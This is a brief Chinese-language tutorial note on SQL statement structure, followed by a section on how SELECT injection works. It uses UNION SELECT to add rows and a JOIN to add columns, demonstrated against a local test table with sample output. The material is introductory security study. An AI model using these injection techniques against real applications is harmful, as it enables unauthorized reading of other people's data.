关于SQL结构
SQL基本结构就是
SELECT [column] FROM [table]
而这条查询语句会产生一个新的table,记为x,而table部分可以是实际的table,也可以是查询产生的table
SQL的基本语句为增删改查,也就是INSERT/DELETE FROM/UPDATE/SELECT,其中只有SELECT会返回一个表,SELECT中包含的子查询只能是SELECT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| INSERT `user` values('ssss','ddddd')
> Affected rows: 1
> 时间: 0.007s
DELETE FROM `user` WHERE `user` = 1
> Affected rows: 1
> 时间: 0.003s
UPDATE `user` set `user` = 1
> Affected rows: 1
> 时间: 0.001s
SELECT * FROM `user`
> OK
> 时间: 0s
+----------+-------+
| pass_or_ | user |
+----------+-------+
| ssss | ddddd |
+----------+-------+
|
关于注入结构
SELECT 注入一般靠union select 和join,union select是增加行数,join增加列,union select要求列数相同
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| SELECT * FROM `user` UNION SELECT 1,2
+----------+------+
| pass_or_ | user |
+----------+------+
| ssss | 1 |
| 1 | 2 |
+----------+------+
SELECT * FROM `user` left JOIN (SELECT 1)a on 1=1
+----------+------+---+
| pass_or_ | user | 1 |
+----------+------+---+
| ssss | 1 | 1 |
+----------+------+---+
|
